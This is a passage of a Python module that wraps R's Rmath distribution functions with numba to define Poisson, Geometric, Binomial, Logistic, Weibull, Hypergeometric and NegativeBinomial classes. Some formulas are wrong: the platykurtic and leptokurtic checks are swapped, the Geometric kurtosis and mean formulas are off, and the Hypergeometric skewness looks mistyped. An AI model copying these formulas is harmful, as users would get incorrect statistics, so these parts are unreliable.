samples contained in array x."""
return sum(pois_logpdf(self.mu, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return pois_cdf(self.mu, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return pois_ccdf(self.mu, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return pois_logcdf(self.mu, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return pois_logccdf(self.mu, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return pois_invcdf(self.mu, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return pois_invccdf(self.mu, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return pois_invlogcdf(self.mu, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return pois_invlogccdf(self.mu, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = pois_rand(self.mu)
return out
# ============================= NEW DISTRIBUTION =================================
dgeom = _rmath_ffi.lib.dgeom
pgeom = _rmath_ffi.lib.pgeom
qgeom = _rmath_ffi.lib.qgeom
@vectorize(nopython=True)
def geom_pdf(p, x):
return dgeom(x, p, 0)
@vectorize(nopython=True)
def geom_logpdf(p, x):
return dgeom(x, p, 1)
@vectorize(nopython=True)
def geom_cdf(p, x):
return pgeom(x, p, 1, 0)
@vectorize(nopython=True)
def geom_ccdf(p, x):
return pgeom(x, p, 0, 0)
@vectorize(nopython=True)
def geom_logcdf(p, x):
return pgeom(x, p, 1, 1)
@vectorize(nopython=True)
def geom_logccdf(p, x):
return pgeom(x, p, 0, 1)
@vectorize(nopython=True)
def geom_invcdf(p, q):
return qgeom(q, p, 1, 0)
@vectorize(nopython=True)
def geom_invccdf(p, q):
return qgeom(q, p, 0, 0)
@vectorize(nopython=True)
def geom_invlogcdf(p, lq):
return qgeom(lq, p, 1, 1)
@vectorize(nopython=True)
def geom_invlogccdf(p, lq):
return qgeom(lq, p, 0, 1)
rgeom = _rmath_ffi.lib.rgeom
@jit(nopython=True)
def geom_rand(p):
return rgeom(p)
@vectorize(nopython=True)
def geom_mgf(p, x):
return p*np.exp(x)/(1 - (1 - p)*np.exp(x)) if x < -np.log(1-p) else None
@vectorize(nopython=True)
def geom_cf(p, x):
return p*np.exp(x*1j)/(1 - (1 - p)*np.exp(x*1j))
# -------------
# Geometric
# -------------
spec = [
('p', float32)
]
@jitclass(spec)
class Geometric():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Geometric'])
def __init__(self, p):
self.p = p
def __str__(self):
return "Geometric(p=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.p)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return 1/self.p
@property
def median(self):
"""Return the median."""
return np.ceil(-1/(np.log2(1-self.p)))
@property
def mode(self):
"""Return the mode."""
return 1
@property
def var(self):
"""Return the variance."""
return (1 - self.p)/(self.p**2)
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return (2 - self.p)/(np.sqrt(1 - self.p))
@property
def kurtosis(self):
"""Return the kurtosis."""
return 9 + self.p/((1 - self.p)**2)
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return (-(1 - self.p)*np.log2(1 - self.p) - self.p*np.log2(self.p))/self.p
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return geom_mgf(self.p, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return geom_cf(self.p, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return isinstance(x, int)
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return geom_pdf(self.p, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return geom_logpdf(self.p, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(geom_logpdf(self.p, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return geom_cdf(self.p, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return geom_ccdf(self.p, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return geom_logcdf(self.p, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return geom_logccdf(self.p, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return geom_invcdf(self.p, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return geom_invccdf(self.p, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return geom_invlogcdf(self.p, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return geom_invlogccdf(self.p, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = geom_rand(self.p)
return out
# ============================= NEW DISTRIBUTION =================================
dbinom = _rmath_ffi.lib.dbinom
pbinom = _rmath_ffi.lib.pbinom
qbinom = _rmath_ffi.lib.qbinom
@vectorize(nopython=True)
def binom_pdf(n, p, x):
return dbinom(x, n, p, 0)
@vectorize(nopython=True)
def binom_logpdf(n, p, x):
return dbinom(x, n, p, 1)
@vectorize(nopython=True)
def binom_cdf(n, p, x):
return pbinom(x, n, p, 1, 0)
@vectorize(nopython=True)
def binom_ccdf(n, p, x):
return pbinom(x, n, p, 0, 0)
@vectorize(nopython=True)
def binom_logcdf(n, p, x):
return pbinom(x, n, p, 1, 1)
@vectorize(nopython=True)
def binom_logccdf(n, p, x):
return pbinom(x, n, p, 0, 1)
@vectorize(nopython=True)
def binom_invcdf(n, p, q):
return qbinom(q, n, p, 1, 0)
@vectorize(nopython=True)
def binom_invccdf(n, p, q):
return qbinom(q, n, p, 0, 0)
@vectorize(nopython=True)
def binom_invlogcdf(n, p, lq):
return qbinom(lq, n, p, 1, 1)
@vectorize(nopython=True)
def binom_invlogccdf(n, p, lq):
return qbinom(lq, n, p, 0, 1)
rbinom = _rmath_ffi.lib.rbinom
@jit(nopython=True)
def binom_rand(n, p):
return rbinom(n, p)
@vectorize(nopython=True)
def binom_mgf(n, p, x):
return (1 - p + p*np.exp(x))**n
@vectorize(nopython=True)
def binom_cf(n, p, x):
return (1 - p + p*np.exp(x*1j))**n
# -------------
# Binomial
# -------------
spec = [
('n', int32), ("p", float32)
]
@jitclass(spec)
class Binomial():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Binomial'])
def __init__(self, n, p):
self.n, self.p = n, p
def __str__(self):
return "Binomial(n=%.5f, p=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.n, self.p)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.n*self.p
@property
def median(self):
"""Return the median."""
return (np.floor(self.n*self.p), np.ceil(self.n*self.p))
@property
def mode(self):
"""Return the mode."""
return (np.floor((self.n + 1)*self.p), np.ceil((self.n + 1)*self.p) - 1)
@property
def var(self):
"""Return the variance."""
return self.n*self.p*(1 - self.p)
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return (1 - 2*self.p)/(np.sqrt(self.n*self.p*(1 - self.p)))
@property
def kurtosis(self):
"""Return the kurtosis."""
return 3 + (1 - 6*self.p*(1 - self.p))/(self.n*self.p*(1 - self.p))
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return .5*np.log(2*np.pi*np.e*self.n*self.p*(1 - self.p))
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return binom_mgf(self.n, self.p, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return binom_cf(self.n, self.p, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return isinstance(x, int)
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return binom_pdf(self.n, self.p, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return binom_logpdf(self.n, self.p, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(binom_logpdf(self.n, self.p, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return binom_cdf(self.n, self.p, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return binom_ccdf(self.n, self.p, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return binom_logcdf(self.n, self.p, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return binom_logccdf(self.n, self.p, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return binom_invcdf(self.n, self.p, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return binom_invccdf(self.n, self.p, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return binom_invlogcdf(self.n, self.p, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return binom_invlogccdf(self.n, self.p, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = binom_rand(self.n, self.p)
return out
# ============================= NEW DISTRIBUTION =================================
dlogis = _rmath_ffi.lib.dlogis
plogis = _rmath_ffi.lib.plogis
qlogis = _rmath_ffi.lib.qlogis
@vectorize(nopython=True)
def logis_pdf(mu, theta, x):
return dlogis(x, mu, theta, 0)
@vectorize(nopython=True)
def logis_logpdf(mu, theta, x):
return dlogis(x, mu, theta, 1)
@vectorize(nopython=True)
def logis_cdf(mu, theta, x):
return plogis(x, mu, theta, 1, 0)
@vectorize(nopython=True)
def logis_ccdf(mu, theta, x):
return plogis(x, mu, theta, 0, 0)
@vectorize(nopython=True)
def logis_logcdf(mu, theta, x):
return plogis(x, mu, theta, 1, 1)
@vectorize(nopython=True)
def logis_logccdf(mu, theta, x):
return plogis(x, mu, theta, 0, 1)
@vectorize(nopython=True)
def logis_invcdf(mu, theta, q):
return qlogis(q, mu, theta, 1, 0)
@vectorize(nopython=True)
def logis_invccdf(mu, theta, q):
return qlogis(q, mu, theta, 0, 0)
@vectorize(nopython=True)
def logis_invlogcdf(mu, theta, lq):
return qlogis(lq, mu, theta, 1, 1)
@vectorize(nopython=True)
def logis_invlogccdf(mu, theta, lq):
return qlogis(lq, mu, theta, 0, 1)
rlogis = _rmath_ffi.lib.rlogis
@jit(nopython=True)
def logis_rand(mu, theta):
return rlogis(mu, theta)
@vectorize(nopython=True)
def logis_mgf(mu, theta, x):
return np.exp(mu*x)*beta(1 - theta*x, 1 + theta*x)
@vectorize(nopython=True)
def logis_cf(mu, theta, x):
return np.exp(mu*x*1j)*np.pi*theta*x/np.sinh(np.pi*theta*x)
# -------------
# Logistic
# -------------
spec = [
('mu', float32), ("theta", float32)
]
@jitclass(spec)
class Logistic():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Logistic'])
def __init__(self, mu, theta):
self.mu, self.theta = mu, theta
def __str__(self):
return "Logistic(mu=%.5f, theta=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.mu, self.theta)
@property
def location(self):
"""Return location parameter if exists."""
return self.mu
@property
def scale(self):
"""Return scale parameter if exists."""
return self.theta
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.mu
@property
def median(self):
"""Return the median."""
return self.mu
@property
def mode(self):
"""Return the mode."""
return self.mu
@property
def var(self):
"""Return the variance."""
return (self.theta**2 * np.pi**2)/3
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return 0
@property
def kurtosis(self):
"""Return the kurtosis."""
return 3 + 1.2
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return np.log(self.theta) + 2
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return logis_mgf(self.mu, self.theta, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return logis_cf(self.mu, self.theta, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return -np.inf < x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return logis_pdf(self.mu, self.theta, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return logis_logpdf(self.mu, self.theta, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(logis_logpdf(self.mu, self.theta, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return logis_cdf(self.mu, self.theta, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return logis_ccdf(self.mu, self.theta, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return logis_logcdf(self.mu, self.theta, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return logis_logccdf(self.mu, self.theta, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return logis_invcdf(self.mu, self.theta, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return logis_invccdf(self.mu, self.theta, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return logis_invlogcdf(self.mu, self.theta, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return logis_invlogccdf(self.mu, self.theta, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = logis_rand(self.mu, self.theta)
return out
# ============================= NEW DISTRIBUTION =================================
dweibull = _rmath_ffi.lib.dweibull
pweibull = _rmath_ffi.lib.pweibull
qweibull = _rmath_ffi.lib.qweibull
@vectorize(nopython=True)
def weibull_pdf(alpha, theta, x):
return dweibull(x, alpha, theta, 0)
@vectorize(nopython=True)
def weibull_logpdf(alpha, theta, x):
return dweibull(x, alpha, theta, 1)
@vectorize(nopython=True)
def weibull_cdf(alpha, theta, x):
return pweibull(x, alpha, theta, 1, 0)
@vectorize(nopython=True)
def weibull_ccdf(alpha, theta, x):
return pweibull(x, alpha, theta, 0, 0)
@vectorize(nopython=True)
def weibull_logcdf(alpha, theta, x):
return pweibull(x, alpha, theta, 1, 1)
@vectorize(nopython=True)
def weibull_logccdf(alpha, theta, x):
return pweibull(x, alpha, theta, 0, 1)
@vectorize(nopython=True)
def weibull_invcdf(alpha, theta, q):
return qweibull(q, alpha, theta, 1, 0)
@vectorize(nopython=True)
def weibull_invccdf(alpha, theta, q):
return qweibull(q, alpha, theta, 0, 0)
@vectorize(nopython=True)
def weibull_invlogcdf(alpha, theta, lq):
return qweibull(lq, alpha, theta, 1, 1)
@vectorize(nopython=True)
def weibull_invlogccdf(alpha, theta, lq):
return qweibull(lq, alpha, theta, 0, 1)
rweibull = _rmath_ffi.lib.rweibull
@jit(nopython=True)
def weibull_rand(alpha, theta):
return rweibull(alpha, theta)
@vectorize(nopython=True)
def weibull_mgf(alpha, theta, x):
return None
@vectorize(nopython=True)
def weibull_cf(alpha, theta, x):
return None
# -------------
# Weibull
# -------------
spec = [
('alpha', float32), ("theta", float32)
]
@jitclass(spec)
class Weibull():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Weibull'])
def __init__(self, alpha, theta):
self.alpha, self.theta = alpha, theta
def __str__(self):
return "Weibull(alpha=%.5f, theta=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.alpha, self.theta)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return self.alpha
@property
def shape(self):
"""Return shape parameter if exists."""
return self.theta
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.alpha*gamma(1 + 1/self.theta)
@property
def median(self):
"""Return the median."""
return self.alpha*(np.log(2))**(1/self.theta)
@property
def mode(self):
"""Return the mode."""
return self.alpha*((self.theta - 1)/self.theta)**(1/self.theta)
@property
def var(self):
"""Return the variance."""
return self.alpha**2*(gamma(1 + 2/self.theta) - (gamma(1 + 1/self.theta))**2)
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return (gamma(1 + 3/self.theta)*self.alpha**3 - 3*self.mean*self.var - self.mean**3)/(self.var**(3/2))
@property
def kurtosis(self):
"""Return the kurtosis."""
return (self.alpha**4*gamma(1 + 4/self.theta) - 4*self.skewness* self.var**(3/2)*self.mean - 6*self.mean**2*self.var - self.mean**4)/(self.var**2)
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return 0.577215664901532860606512090082 * (1 - 1/self.theta) + np.log(self.alpha/self.theta) + 1
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return weibull_mgf(self.alpha, self.theta, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return weibull_cf(self.alpha, self.theta, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return 0 <= x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return weibull_pdf(self.alpha, self.theta, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return weibull_logpdf(self.alpha, self.theta, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(weibull_logpdf(self.alpha, self.theta, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return weibull_cdf(self.alpha, self.theta, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return weibull_ccdf(self.alpha, self.theta, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return weibull_logcdf(self.alpha, self.theta, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return weibull_logccdf(self.alpha, self.theta, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return weibull_invcdf(self.alpha, self.theta, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return weibull_invccdf(self.alpha, self.theta, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return weibull_invlogcdf(self.alpha, self.theta, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return weibull_invlogccdf(self.alpha, self.theta, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = weibull_rand(self.alpha, self.theta)
return out
# ============================= NEW DISTRIBUTION =================================
dhyper = _rmath_ffi.lib.dhyper
phyper = _rmath_ffi.lib.phyper
qhyper = _rmath_ffi.lib.qhyper
@vectorize(nopython=True)
def hyper_pdf(s, f, n, x):
return dhyper(x, s, f, n, 0)
@vectorize(nopython=True)
def hyper_logpdf(s, f, n, x):
return dhyper(x, s, f, n, 1)
@vectorize(nopython=True)
def hyper_cdf(s, f, n, x):
return phyper(x, s, f, n, 1, 0)
@vectorize(nopython=True)
def hyper_ccdf(s, f, n, x):
return phyper(x, s, f, n, 0, 0)
@vectorize(nopython=True)
def hyper_logcdf(s, f, n, x):
return phyper(x, s, f, n, 1, 1)
@vectorize(nopython=True)
def hyper_logccdf(s, f, n, x):
return phyper(x, s, f, n, 0, 1)
@vectorize(nopython=True)
def hyper_invcdf(s, f, n, q):
return qhyper(q, s, f, n, 1, 0)
@vectorize(nopython=True)
def hyper_invccdf(s, f, n, q):
return qhyper(q, s, f, n, 0, 0)
@vectorize(nopython=True)
def hyper_invlogcdf(s, f, n, lq):
return qhyper(lq, s, f, n, 1, 1)
@vectorize(nopython=True)
def hyper_invlogccdf(s, f, n, lq):
return qhyper(lq, s, f, n, 0, 1)
rhyper = _rmath_ffi.lib.rhyper
@jit(nopython=True)
def hyper_rand(s, f, n):
return rhyper(s, f, n)
@vectorize(nopython=True)
def hyper_mgf(s, f, n, x):
return None
@vectorize(nopython=True)
def hyper_cf(s, f, n, x):
return None
# -------------
# Hypergeometric
# -------------
spec = [
('s', int32), ("f", int32), ("n", int32)
]
@jitclass(spec)
class Hypergeometric():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Hypergeometric'])
def __init__(self, s, f, n):
self.s, self.f, self.n = s, f, n
def __str__(self):
return "Hypergeometric(s=%.5f, f=%.5f, n=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.s, self.f, self.n)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.n*(self.s/(self.s + self.f))
@property
def median(self):
"""Return the median."""
return None
@property
def mode(self):
"""Return the mode."""
return np.floor((self.n + 1)*(self.s + 1)/(self.s + self.f + 2))
@property
def var(self):
"""Return the variance."""
return self.n*(self.s/(self.s + self.f))*(self.f/(self.s + self.f))* (self.s + self.f - self.n)/(self.s + self.f - 1)
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return ((self.f)*(self.s + self.f - 1)**(.5)* (self.s + self.f - 2*self.n))/(((self.n*self.s*self.s* (self.s + self.f - self.n))**(.5)*(self.s + self.f - 2)))
@property
def kurtosis(self):
"""Return the kurtosis."""
return 3 + 1/(self.n*self.s*self.f*(self.s + self.f - self.n)* (self.s + self.f - 2)*(self.s + self.f - 3))* ((self.s + self.f - 1)*(self.s + self.f)**2*((self.s + self.f)* (self.s + self.f + 1) - 6*self.s*self.f - 6*self.n* (self.s + self.f -self.n)) + 6*self.n*self.s*self.f* (self.s + self.f - self.n)*(5*(self.s + self.f) - 6))
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return None
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return hyper_mgf(self.s, self.f, self.n, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return hyper_cf(self.s, self.f, self.n, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return isinstance(x, int)
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return hyper_pdf(self.s, self.f, self.n, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return hyper_logpdf(self.s, self.f, self.n, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(hyper_logpdf(self.s, self.f, self.n, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return hyper_cdf(self.s, self.f, self.n, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return hyper_ccdf(self.s, self.f, self.n, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return hyper_logcdf(self.s, self.f, self.n, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return hyper_logccdf(self.s, self.f, self.n, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return hyper_invcdf(self.s, self.f, self.n, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return hyper_invccdf(self.s, self.f, self.n, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return hyper_invlogcdf(self.s, self.f, self.n, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return hyper_invlogccdf(self.s, self.f, self.n, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = hyper_rand(self.s, self.f, self.n)
return out
# ============================= NEW DISTRIBUTION =================================
dnbinom = _rmath_ffi.lib.dnbinom
pnbinom = _rmath_ffi.lib.pnbinom
qnbinom = _rmath_ffi.lib.qnbinom
@vectorize(nopython=True)
def nbinom_pdf(r, p, x):
return dnbinom(x, r, p, 0)
@vectorize(nopython=True)
def nbinom_logpdf(r, p, x):
return dnbinom(x, r, p, 1)
@vectorize(nopython=True)
def nbinom_cdf(r, p, x):
return pnbinom(x, r, p, 1, 0)
@vectorize(nopython=True)
def nbinom_ccdf(r, p, x):
return pnbinom(x, r, p, 0, 0)
@vectorize(nopython=True)
def nbinom_logcdf(r, p, x):
return pnbinom(x, r, p, 1, 1)
@vectorize(nopython=True)
def nbinom_logccdf(r, p, x):
return pnbinom(x, r, p, 0, 1)
@vectorize(nopython=True)
def nbinom_invcdf(r, p, q):
return qnbinom(q, r, p, 1, 0)
@vectorize(nopython=True)
def nbinom_invccdf(r, p, q):
return qnbinom(q, r, p, 0, 0)
@vectorize(nopython=True)
def nbinom_invlogcdf(r, p, lq):
return qnbinom(lq, r, p, 1, 1)
@vectorize(nopython=True)
def nbinom_invlogccdf(r, p, lq):
return qnbinom(lq, r, p, 0, 1)
rnbinom = _rmath_ffi.lib.rnbinom
@jit(nopython=True)
def nbinom_rand(r, p):
return rnbinom(r, p)
@vectorize(nopython=True)
def nbinom_mgf(r, p, x):
return (p/(1 - (1 - p)*np.exp(x)))**r
@vectorize(nopython=True)
def nbinom_cf(r, p, x):
return (p/(1 - (1 - p)*np.exp(x*1j)))**r
# -------------
# NegativeBinomial
# -------------
spec = [
('r', int32), ("p", float32)
]
@jitclass(spec)
class NegativeBinomial():
# set docstring
__doc__ = _create_class_docstr(**mtdt['NegativeBinomial'])
def __init__(self, r, p):
self.r, self.p = r, p
def __str__(self):
return "NegativeBinomial(r=%.5f, p=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.r, self.p)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return (1 - self.p)*self.r/self.p
@property
def median(self):
"""Return the median."""
return None
@property
def mode(self):
"""Return the mode."""
return np.floor((1 - self.p)*(self.r - 1 )/self.p)
@property
def var(self):
"""Return the variance."""
return (1 - self.p)*self.r/self.p**2
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return (2 - self.p)/(np.sqrt((1 - self.p)*self.r))
@property
def kurtosis(self):
"""Return the kurtosis."""
return 6/self.r + self.p**2/((1 - self.p)*self.r)
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return None
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return nbinom_mgf(self.r, self.p, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return nbinom_cf(self.r, self.p, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return isinstance(x, int)
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return nbinom_pdf(self.r, self.p, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return nbinom_logpdf(self.r, self.p, x)
def loglikelihood(self, x):
